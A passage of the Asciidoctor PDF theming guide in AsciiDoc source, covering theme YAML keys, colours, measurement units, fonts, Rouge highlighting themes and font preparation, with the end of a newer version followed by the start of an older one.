landscape\n\n|pdf-page-margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n|:pdf-page-margin: [1in, 0.5in]\n\n|pdf-page-size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width, height]>>\n|:pdf-page-size: 6in x 9in\n\n|pdf-folio-placement\n|virtual {vbar} virtual-inverted {vbar} physical {vbar} physical-inverted\n|:pdf-folio-placement: physical\n\n|pdf-version\n|1.3 {vbar} 1.4 {vbar} 1.5 {vbar} 1.6 {vbar} 1.7 (default: 1.4)\n|:pdf-version: 1.7\n\n|pdfmark^[6]^\n|flag (default: _not set_)\n|:pdfmark:\n\n|text-align^[7]^\n|<<text-alignments,Text alignment>>\n|:text-align: left\n\n|title-logo-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n\n|title-page^[8]^\n|flag (default: _not set_)\n|:title-page:\n\n|title-page-background-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-page-background-image: image:title-bg.jpg[]\n|===\n\n. `<face>` can be `front` or `back`.\n. The path is resolved relative to base_dir.\n. The target of the image macro is resolved relative to `imagesdir`.\nIf the image macro syntax is not used, the value is resolved relative to the base directory, which defaults to the document directory.\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`) and centered (i.e., `position=center`).\nThe size of the background image can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nThe position of the background image can be controlled using the `position` attribute.\nIf the recto (right-hand, odd-numbered pages) or verso (left-hand, even-numbered pages) background is specified, it will be used only for that side.\nIf a background image isn't specified for a side, the converter will use the default page background image (`page-background-image`), if specified.\nTo disable the background image for a side, use the value `none`.\n. Controls whether the `page-number` attribute is accessible to the running header and footer content specified in the theme file.\nUse the `noheader` and `nofooter` attributes to disable the running header and footer, respectively, from the document.\n. Enables generation of the http:\/\/milan.kupcevic.net\/ghostscript-ps-pdf\/#marks[pdfmark] file, which contains metadata that is fed to Ghostscript when optimizing the PDF file.\n. _(Experimental)_ The `text-align` document attribute is intended as a simple way to toggle text justification.\nThe value of this attribute overrides the `base-align` key set by the theme.\nFor more fine-grained control, you should customize using the theme.\n. Force a title page to be added even when the doctype is not book.\n\n== Publishing Mode\n\nAsciidoctor PDF provides the following features to assist with publishing:\n\n* Double-sided (mirror) page margins\n* Automatic facing pages\n\nThese features are activated when you set the `media` attribute to `prepress` in the header of your AsciiDoc document or from the CLI or API.\nThe following sections describe the behaviors that this setting activates.\n\n=== Double-Sided Page Margins\n\nThe page margins for the recto (right-hand, odd-numbered) and verso (left-hand, even-numbered) pages are automatically calculated by replacing the side page margins with the values of the `page-margin-inner` and `page-margin-outer` keys.\n\nFor example, let's assume you've defined the following settings in your theme:\n\n[source,yaml]\n----\npage:\n margin: [0.5in, 0.67in, 0.67in, 0.67in]\n margin-inner: 0.75in\n margin-outer: 0.59in\n----\n\nThe page margins for the recto and verso pages will be resolved as follows:\n\nrecto page margin:: [0.5in, *0.59in*, 0.67in, *0.75in*]\nverso page margin:: [0.5in, *0.75in*, 0.67in, *0.59in*]\n\nThe page margins alternate between recto and verso.\nThe first page in the document is a recto page.\n\n=== Automatic Facing Pages\n\nWhen converting the book doctype using the prepress media setting, a blank page will be inserted when necessary to ensure the following elements start on a recto page:\n\n* Title page\n* Table of contents\n* First page of body\n* Parts and chapters\n\nOther \"`facing`\" pages may be added in the future.\n\nIt's possible to disable the automatic facing feature for a given part or chapter.\nThis can be done by adding the nonfacing option to the section node.\nWhen the nonfacing option is present, the part or chapter title will be placed on the following page.\n\n[source,asciidoc]\n----\n[%nonfacing]\n= Minor Chapter\n\ncontent\n----\n\nFor documents that use the article doctype, Asciidoctor PDF incorrectly places the document title and table of contents on their own pages.\nThis can result in the page numbering and the page facing to be out of sync.\nAs a workaround, Asciidoctor PDF inserts a blank page, if necessary, to ensure the first page of body content is a recto-facing page.\n\nYou can check on the status of this defect by following https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/95[issue #95].\n\n== Source Highlighting Theme\n\nYou can define and apply your own source highlighting theme to source blocks when using Rouge as the source highlighter.\nThis section explains how.\n\nA custom theme for Rouge is defined using a Ruby class.\nStart by creating a Ruby source file to define your theme.\nName the file according to the name of your theme and put the file in a folder of your choice (e.g., [.path]_rouge_themes\/custom.rb_).\nThe name of the Ruby class doesn't matter, though it's customary to name it according to the name of the theme as well.\n\n.rouge_themes\/custom.rb\n[source,ruby]\n----\nrequire 'rouge' unless defined? ::Rouge.version\n\nmodule Rouge; module Themes\n class Custom < CSSTheme\n name 'custom'\n\n style Comment, fg: '#008800', italic: true\n style Error, fg: '#a61717', bg: '#e3d2d2'\n style Str, fg: '#0000ff'\n style Str::Char, fg: '#800080'\n style Num, fg: '#0000ff'\n style Keyword, fg: '#000080', bold: true\n style Operator::Word, bold: true\n style Name::Tag, fg: '#000080', bold: true\n style Name::Attribute, fg: '#ff0000'\n style Generic::Deleted, fg: '#000000', bg: '#ffdddd', inline_block: true, extend: true\n style Generic::Inserted, fg: '#000000', bg: '#ddffdd', inline_block: true, extend: true\n style Text, {}\n end\nend; end\n----\n\nEach style declaration accepts the following properties:\n\n* `fg` - sets the foreground (text) color\n* `bg` - sets the background color\n* `bold` - change the font weight to bold\n* `italic` - change the font style to italic\n* `underline` - add an underline to the text\n* `inline_block` - fill the background color to the height of the line (Asciidoctor PDF only)\n* `extend` - extend the background color to the end of the line for a line-oriented match (Asciidoctor PDF only)\n\nColors are defined using hexidecimal format (e.g., #ff0000 for red).\n\nUse the `Text` token to set the background color of the source block and the default text color.\n\nThe complete list of tokens can be found in the https:\/\/github.com\/jneen\/rouge\/blob\/master\/lib\/rouge\/token.rb[token.rb] file from Rouge.\nRefer to the https:\/\/github.com\/jneen\/rouge\/tree\/master\/lib\/rouge\/themes[bundled themes] to find more examples.\n\nOnce you've defined your theme, you need to enable it use it using the `rouge-style` document attribute, which you specify in the document header or via the Asciidoctor CLI or API.\n\n[source,asciidoc]\n----\n:source-highlighter: rouge\n:rouge-style: custom\n----\n\nFinally, you need to active your theme by requiring the theme file when you invoke Asciidoctor.\n\n $ asciidoctor -r .\/rouge_themes\/custom.rb sample.adoc\n\nYou should now see that the source code is highlighted to your liking.\nFor more information about source highlighting with Rouge, refer to the http:\/\/rouge.jneen.net\/[Rouge project page].\n\n\/\/\/\/\n== Resources for Extending Asciidoctor PDF\n\n* http:\/\/www.sitepoint.com\/hackable-pdf-typesetting-in-ruby-with-prawn[Hackable PDF typesetting in Ruby with Prawn]\n\/\/\/\/\n\n[appendix]\n== Preparing a Custom Font\n\nAny TTF font can be used with Prawn--and hence Asciidoctor PDF--without modifications (unless, of course, it's corrupt or contains errors).\nHowever, you may discover that kerning is disabled and certain required glyphs are missing.\nTo address these problems, you need to prepare the font using a font program such as {url-fontforge}[FontForge].\n\n=== Validate the Font\n\nBefore using the font, you may want to check that the font is valid.\nTo do so, create the following script, which will verify that the TTF font is free from errors.\n\n.validate-font.rb\n[source,ruby]\n----\nrequire 'ttfunk'\nrequire 'ttfunk\/subset_collection'\n\nttf_subsets = TTFunk::SubsetCollection.new TTFunk::File.open ARGV[0]\n(0...(ttf_subsets.instance_variable_get :@subsets).size).each {|idx| ttf_subsets[idx].encode }\n----\n\nRun the script on your font as follows:\n\n $ ruby validate-font.rb path\/to\/font.ttf\n\nIf this script fails, the font will not work with Asciidoctor PDF.\nTo repair it, open the font in FontForge and resave it using menu:File[Generate Fonts...,Generate].\nDismiss any warning dialogs.\n\nResaving the font in FontForge will usually resolve any errors in the font.\n(If not, you may need to find another font, or at least another copy of it).\n\n=== Modifying the Font\n\nTo ready your font for use with Asciidoctor PDF, you'll need to modify it using a font program.\nWe recommend using {url-fontforge}[FontForge].\nBut don't let this scare you off.\nFontForge essentially works like a vector-drawing tool, in which each character is a separate canvas.\nYou can find a crash course in how to use the program on the FontForge project site.\n\nHere are the modifications you need to apply to a custom font for it to work best with Asciidoctor PDF:\n\n* Convert the font to TTF (only required if the font is not already a TTF, such as an OTF or TTC).\n* Add the glyphs for the required characters if missing from the font (optional if using a falback font).\n* Subset the font to exclude unused characters to reduce the file size (optional).\n* Save the file using the old-style kern table to activate kerning.\n\nNOTE: Technically, subsetting the font (i.e., removing glyphs) is not required since Prawn only embeds the characters from the font used in the document (i.e., it automatically subsets the font).\nHowever, if you plan to commit the font to a repository, subsetting helps keep the file size down.\n\nMost fonts do not provide glyphs for all the Unicode character ranges (i.e., scripts).\n(A glyph is the corresponding vector image for a Unicode character).\nIn fact, many fonts only include glyphs for Latin (Basic, Supplement, and Extended) and a few other scripts (e.g., Cyrillic, Greek).\nThat means certain glyphs Asciidoctor PDF relies on may be missing from the font.\n\nBelow are are the non-Latin characters that Asciidoctor PDF uses (for which glyphs are often missing):\nUnless you're using a fallback font that fills in the missing glyphs, you need to ensure these glyphs are present in your font (and add them if not).\n\n* \\u00a0 - no-break space\n* \\ufeff - zero width no-break space\n* \\u200b - zero width space (used for line break hints)\n* \\u000a - line feed character (zero width)\n* \\u2009 - thin spaced (used in the button UI element)\n* \\u202f - narrow no-break space (used in the keybinding UI element)\n* \\u2011 - non-breaking hyphen\n* \\u2022 - disc (used for first-level unordered list level)\n* \\u25e6 - circle (used for second-level unordered list level)\n* \\u25aa - square (used for third-level unordered list level)\n* \\u2611 - ballot box checked (used for checked list item)\n* \\u2610 - ballot box unchecked (used for unchecked list item)\n* \\u2014 - em-dash (used in quote attribute)\n* \\u203a - single right-pointing quotation mark (used in the menu UI element)\n* \\u25ba - right pointer (used for media play icon when icon fonts are disabled)\n\nIf you're preparing a font for use in verbatim blocks (e.g., a listing block), you'll also need this range of characters:\n\n* \\u2460 to \\u2468 - circled numbers\n\nOne way to get these glyphs is to steal them from another font (or from another character in the same font).\nTo do so, open the other font in FontForge, select the character, press kbd:[Ctrl,c], switch back to your font, select the character again, and press kbd:[Ctrl,v].\nYou may need to scale the glyph so it fits properly in the art box.\n\nIMPORTANT: If you're copying a non-visible character, be sure to set the width to 0 using menu:Metrics[Set Width...], enter 0 into *Set Width To*, then click btn:[OK].\n\nWhen you're done, save the font with the old-style kern table enabled.\nTo do so, select menu:File[Generate Fonts...], click btn:[Options], and make sure only the following options are selected (equivalent to the flags 0x90 + 0x08):\n\n* [x] OpenType\n ** [x] Old style 'kern'\n\nThen click btn:[Generate] to generate and save the font.\n\nYour font file is now ready to be used with Asciidoctor PDF.\n\n=== Scripting the Font Modifications\n\nPerforming all this font modification manually can be tedious (not to mention hard to reproduce).\nFortunately, FontForge provides a {url-fontforge-scripting}[scripting interface], which you can use to automate the process.\n\nIn fact, that's what we use to prepare the fonts that are bundled with Asciidoctor PDF.\nYou can find that FontForge script, the Bash script that calls it, and the Docker image in which it is run in the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/tree\/master\/scripts[scripts directory] of this project.\nYou can use that script as a starting point or reference for your own font preparation \/ modification script.\n","old_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>\n\/\/ Settings:\n:idprefix:\n:idseparator: -\n:toc: preamble\n:experimental:\nifndef::env-github[:icons: font]\nifdef::env-github[]\n:outfilesuffix: .adoc\n:!toc-title:\n:caution-caption: :fire:\n:important-caption: :exclamation:\n:note-caption: :paperclip:\n:tip-caption: :bulb:\n:warning-caption: :warning:\nendif::[]\n:window: _blank\n\/\/ Aliases:\n:conum-guard-yaml: #\nifndef::icons[:conum-guard-yaml: # #]\nifdef::backend-pdf[:conum-guard-yaml: # #]\n:url-fontforge: https:\/\/fontforge.github.io\/en-US\/\n:url-fontforge-scripting: https:\/\/fontforge.github.io\/en-US\/documentation\/scripting\/\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\n[.lead]\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file Asciidoctor PDF generates from AsciiDoc.\nThis document describes how the theming system works, how to define a custom theme in YAML and how to activate the theme when running Asciidoctor PDF.\n\nTIP: The quickest way to get started creating your own theme is to <<Extends,extend the default theme>>.\nThis not only gives you all the styles you need to build on, but also a collection of <<Bundled Fonts,bundled fonts>>.\nIf you override the font catalog in your theme file, you must declare all the fonts you use (and provide the font files themselves).\nInsted, if you want to reuse the bundled fonts, simply reference the <<Bundled Fonts,bundled fonts>> in the <<Custom Fonts,font catalog>>.\n\nWARNING: If you don't declare your own fonts (or extend the default theme), only the built-in (AFM) fonts provided by the PDF reader will be available.\nUsing AFM fonts can result in missing functionality and warnings.\nSee the <<Built-In (AFM) Fonts>> section to learn more about these limitations.\n\ntoc::[]\n\n== Language Overview\n\nThe Asciidoctor PDF theme language is described using the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many _concepts_ from CSS and SASS.\nTherefore, if you have a background in web design, the terminology should be immediately familiar to you.\n*Note, however, that the theming system isn't actually CSS.*\n\nLike CSS, themes have both selectors and properties.\nSelectors are the component you want to style.\nThe properties are the style elements of that component that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font-size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\n* An underscore (`_`) may be used in place of a hyphen (`-`) in all property names (so you may use `font_family` or `font-family`).\n* An underscore (`_`) may be used in place of a hyphen (`-`) in all variable names (so you may use `$base_font_family` or `$base-font-family`).\n* Instead of separate properties for font weight and font style, the theme language combines these settings in the `font-style` property (allowed values: `normal`, `bold`, `italic` and `bold_italic`).\n* The `align` property in the theme language is roughly equivalent to the `text-align` property in CSS.\n* The `font-color` property in the theme language is equivalent to the `color` property in CSS.\n====\n\nA theme is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font-color: #333333\n font-family: Times-Roman\n font-size: 12\n line-height-length: 17\n line-height: $base-line-height-length \/ $base-font-size\nvertical-spacing: $base-line-height-length\nheading:\n font-color: #262626\n font-size: 17\n font-style: bold\n line-height: 1.2\n margin-bottom: $vertical-spacing\nlink:\n font-color: #002FA7\noutline-list:\n indent: $base-font-size * 1.5\nfooter:\n height: $base-line-height-length * 2.5\n line-height: 1\n recto:\n right:\n content: '{page-number}'\n verso:\n left:\n content: $footer-recto-right-content\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme, which is loaded prior to loading your custom theme.\nAll the available keys are documented in <<Keys>>.\nThe converter uses the information from the theme map to help construct the PDF.\n\nInstead of writing a theme from scratch, you can extend the default theme using the `extends` key as follows:\n\n[source,yaml]\n----\nextends: default\nbase:\n font-color: #ff0000\n----\n\nYou can also point the extends key at another custom theme to extend from it.\nCurrently, the base theme is always loaded first.\n\nWARNING: If you start a new theme from scratch, we strongly recommend defining TrueType fonts and specifying them in the `base` and `literal` categories.\nOtherwise, Asciidoctor PDF will use built-in AFM fonts, which can result in missing functionality and warnings.\n\n[TIP]\n====\nInstead of creating a theme from scratch, another option is to download the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default-theme.yml] file from the source repository.\nSave the file using a unique name (e.g., _custom-theme.yml_) and start hacking on it.\n\nAlternatively, you can snag the file from your local installation using the following command:\n\n $ ASCIIDOCTOR_PDF_DIR=`gem contents asciidoctor-pdf --show-install-dir`;\\\n cp \"$ASCIIDOCTOR_PDF_DIR\/data\/themes\/default-theme.yml\" custom-theme.yml\n====\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`) or hyphen (`-`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font-color`) into a single, qualified key (e.g., `link_font_color` or `link-font-color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase-font-color: #333333\nbase-font-family: Times-Roman\nbase-font-size: 12\n----\n\nOr, to avoid having to type the prefix `base-` multiple times, the keys may be written as a hierarchy:\n\n[source,yaml]\n----\nbase:\n font-color: #333333\n font-family: Times-Roman\n font-size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by two spaces from the indentation of the parent level.\nAlso note the presence of the colon (`:`) after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n ** Font family name (e.g., Roboto)\n ** Font style (normal, bold, italic, bold_italic)\n ** Alignment (left, center, right, justify)\n ** Color as hex string (e.g., 'ff0000', #ff0000, or '#ff0000')\n ** Image path\n ** Enumerated type (where specified)\n ** Text content (where specified)\n* Null (clears any previously assigned value)\n ** _empty_ (i.e., no value specified)\n ** null\n ** ~\n* Number (integer or float) with optional units (default unit is points)\n* Array\n ** Color as RGB array (e.g., [51, 51, 51])\n ** Color CMYK array (e.g., [50, 100, 0, 0])\n ** Margin (e.g., [1in, 1in, 1in, 1in])\n ** Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color or $base-font-color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<Keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a principle feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font-family\n* font-color\n* font-size\n* font-style\n* text-transform\n* line-height (currently some exceptions)\n* margin-bottom (if not specified, defaults to $vertical-spacing)\n\n.Heading Inheritance\n****\nHeadings inherit starting from a specific heading level (e.g., `heading-h2-font-size`), then to the heading category (e.g., `heading-font-size`), then directly to the base value (e.g., `base-font-size`).\nAny setting from an enclosing context, such as a sidebar, is skipped.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base-font-size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nIMPORTANT: Variables are defined from top to bottom (i.e., in document order).\nTherefore, a variable must be defined before it is referenced.\nIn other words, the path the variable refers to must be *above* the usage of that variable.\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font-color: #333333\n----\n\nthe variable `$base-font-color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading-font-color` to the `$sidebar-title-font-color`.\n\n[source,yaml]\n----\nheading:\n font-color: #191919\nsidebar:\n title:\n font-color: $heading-font-color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font-size: 12\n font-size-large: $base-font-size * 1.25\n font-size-small: $base-font-size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom Variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your brand colors:\n\n[source,yaml,subs=attributes+]\n----\nbrand:\n primary-color: #E0162B {conum-guard-yaml} <1>\n secondary-color: '#FFFFFF' {conum-guard-yaml} <2>\n alert-color: '0052A5' {conum-guard-yaml} <3>\n----\n<1> To align with CSS, you may add `+#+` in front of the hex color value to coerce it to a string.\nA YAML preprocessor is used to ensure the value is not treated as a comment as would normally be the case in YAML.\n<2> You may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\n<3> The leading `+#+` on a hex value is entirely optional.\nHowever, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value (for example, 000000 would become 0, so use '000000' or #000000 instead).\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: $brand-primary-color\n----\n\n=== Math Expressions & Functions\n\nThe theme language supports basic math operations to support calculated values.\nLike programming languages, multiple and divide take precedence over add and subtract.\n\nThe following table lists the supported operations and the corresponding operator for each.\n\n[width=25%]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nIMPORTANT: Operators must always be surrounded by a space on either side (e.g., 2 + 2, not 2+2).\n\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line-height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font-size: 12\n font-size-large: $base-font-size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font-size: 12.5\n font-size-large: ceil($base-font-size * 1.25)\n----\n\n=== Measurement Units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nIf you specify a number without any units, the units defaults to pt.\n\nHowever, us humans like to think in real world units like inches (in), centimeters (cm), or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[width=25%]\n|===\n|Unit |Suffix\n\n|Centimeter\n|cm\n\n|Inches\n|in\n\n|Millimeter\n|mm\n\n|Percentage^[1]^\n|%, vw, or vh\n\n|Points\n|pt (default)\n|===\n\n. A percentage with the % unit is calculated relative to the width or height of the content area.\nViewport-relative percentages (vw or vh units) are calculated as a percentage of the page width or height, respectively.\nCurrently, percentage units can only be used for placing elements on the title page or for setting the width of a block image.\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. left\n\n=== Alignments\n\nThe align subkey is used to align text and images within the parent container.\n\n==== Text Alignments\n\nText can be aligned as follows:\n\n* left\n* center\n* right\n* justify (stretched to each edge)\n\n==== Image Alignments\n\nImages can be aligned as follows:\n\n* left\n* center\n* right\n\n=== Font Styles\n\nIn most cases, whereever you can specify a custom font family, you can also specify a font style.\nThese two settings are combined to locate the font to use.\n\nThe following font styles are recognized:\n\n* normal (no style)\n* italic\n* bold\n* bold_italic\n\n=== Text Transforms\n\nMany places where font properties can be specified, a case transformation can be applied to the text.\nThe following transforms are recognized:\n\n* uppercase\n* lowercase\n* none (clears an inherited value)\n\n[CAUTION#transform-unicode-letters]\n====\nSince Ruby 2.4, Ruby has built-in support for transforming the case of any letter defined by Unicode.\n\nIf you're using Ruby < 2.4, and the text you want to transform contains characters beyond the Basic Latin character set (e.g., an accented character), you must install either the `activesupport` or the `unicode` gem in order for those characters to be transformed.\n\n $ gem install activesupport\n\nor\n\n $ gem install unicode\n====\n\n\/\/ Additional transforms, such as capitalize, may be added in the future.\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`, optional surrounding quotes, or both.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\nTransparent:: The special value `transparent` indicates that a color should not be used.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`), optional surrounding quotes, or both.\n\nTo align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment as would normally be the case in YAML.\nThat same preprocessor will also coerce a primitive value to a string if `color` is the name of the last segment in the key (e.g., `font-color`).\nThis avoids the problem of 000 becoming 0 (and similar implicit conversions) when the theme file is parsed.\n\nYou also may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\nIn this case, the leading `+#+` on a hex value is entirely optional.\n\nRegardless, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nThe following are all equivalent values for the color red:\n\n[cols=\"8*m\"]\n|===\n|#ff0000\n|#FF0000\n|'ff0000'\n|'FF0000'\n|#f00\n|#F00\n|'f00'\n|'F00'\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font-color: [0, 0.99, 1, 0]\n----\n\n==== Transparent\n\nIt's possible to specify no color by assigning the special value `transparent`, as shown here:\n\n[source,yaml]\n----\nbase:\n background-color: transparent\n----\n\n=== Images\n\nAn image is specified either as a bare image path or as an inline image macro as found in the AsciiDoc syntax.\nImages in the theme file are currently resolved relative to the value of the `pdf-themesdir` attribute.\n(If `pdf-theme` is a path that ends in `.yml`, and `pdf-themesdir` is not set, then the images are resolved relative to the directory of the path specified by `pdf-theme`).\n\nThe following image types (and corresponding file extensions) are supported:\n\n* PNG (.png)\n* JPEG (.jpg)\n* SVG (.svg)\n\nCAUTION: The GIF format (.gif) and BMP format (.bmp) are not supported unless you're using prawn-gmagick.\nSee https:\/\/github.com\/asciidoctor\/asciidoctor-pdf#supporting-additional-image-file-formats[support for additional image file formats] for details.\n\nHere's how an image is specified in the theme file as a bare image path:\n\n[source,yaml]\n----\ntitle-page:\n background-image: title-cover.png\n----\n\nHere's how the image is specified using the inline image macro:\n\n[source,yaml]\n----\ntitle-page:\n background-image: image:title-cover.png[]\n----\n\nIn either case, the image is resolved relative to the value of the `pdf-themesdir` attribute, as previously described.\n\nLike in the AsciiDoc syntax, wrapping the value in the image macro allows you to specify other settings, such as `pdfwidth`, `fit`, and\/or `align`.\nFor example:\n\n[source,yaml]\n----\ntitle-page:\n logo-image: image:logo.png[width=250,align=center]\n----\n\n=== Quoted String\n\nSome of the keys accept a quoted string as text content.\nThe final segment of these keys is always named `content`.\n\nA content key accepts a string value.\nIt's usually best to quote the string or use the http:\/\/symfony.com\/doc\/current\/components\/yaml\/yaml_format.html#strings[YAML multi-line string syntax].\n\nText content may be formatted using a subset of inline HTML.\nYou can use the well-known elements such as `<strong>`, `<em>`, `<code>`, `<a>`, `<sub>`, `<sup>`, `<del>`, and `<span>`.\nThe `<span>` element supports the `style` attribute, which you can use to specify the `color`, `font-weight`, and `font-style` CSS properties.\nYou can also use the `rgb` attribute on the `<color>` element to change the color or the `name` and `size` attributes on the `<font>` element to change the font properties.\nIf you need to add an underline or strikethrough decoration to the text, you can assign the `underline` or `line-through` to the `class` attribute on any aforementioned element.\n\nHere's an example of using formatting in the content of the menu caret:\n\n[source,yaml]\n----\nmenu-caret-content: \" <font size=\\\"1.15em\\\"><color rgb=\\\"#b12146\\\">\\u203a<\/color><\/font> \"\n----\n\nNOTE: The string must be double quoted in order to use a Unicode escape code like `\\u203a`.\n\nAdditionally, normal substitutions are applied to the value of content keys for <<Running Content (Header & Footer),running content>>, so you can use most AsciiDoc inline formatting (e.g., `+*strong*+` or `+{attribute-name}+`) in the values of those keys.\n\n== Fonts\n\nYou can select from <<built-in-afm-fonts,built-in PDF fonts>>, <<bundled-fonts,fonts bundled with Asciidoctor PDF>> or <<custom-fonts,custom fonts>> loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\nIMPORTANT: Asciidoctor has no challenge working with Unicode.\nIn fact, it prefers Unicode and considers the entire range.\nHowever, once you convert to PDF, you have to meet the font requirements of PDF in order to preserve Unicode characters.\nThat means you need to provide a font (at least a fallback font) that contains glyphs for all the characters you want to use.\nIf you don't, you may notice that characters are missing.\nThere's nothing Asciidoctor can do to convince PDF to work with extended characters without the right fonts in play.\n\n=== Built-In (AFM) Fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[width=33.33%]\n|===\n|Font Name |Font 